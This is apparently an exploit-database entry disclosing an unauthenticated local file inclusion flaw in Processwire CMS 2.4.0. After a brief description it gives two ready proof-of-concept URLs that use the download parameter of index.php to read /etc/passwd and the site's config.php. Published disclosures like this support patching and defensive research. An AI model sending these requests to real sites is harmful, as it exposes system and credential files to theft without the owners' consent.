20 lines
No EOL
685 B
Text
20 lines
No EOL
685 B
Text
# Exploit Title: [Local File Inclusion Processwire CMS 2.4.0]
|
|
# Vulnerability Type: Unauthenticated LFI
|
|
# Date: [03.11.2020]
|
|
# Exploit Author: [Y1LD1R1M]
|
|
# Type: [WEBAPPS]
|
|
# Platform: [PHP]
|
|
# Vendor Homepage: [https://processwire.com/]
|
|
# Version: [2.4.0]
|
|
# Tested on: [Kali Linux]
|
|
|
|
|
|
** Description **
|
|
|
|
Local File Inclusion in Processwire CMS 2.4.0 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.
|
|
|
|
** Proof of Concept **
|
|
|
|
http://URL/index.php?download=/etc/passwd
|
|
|
|
http://URL/index.php?download=../config.php |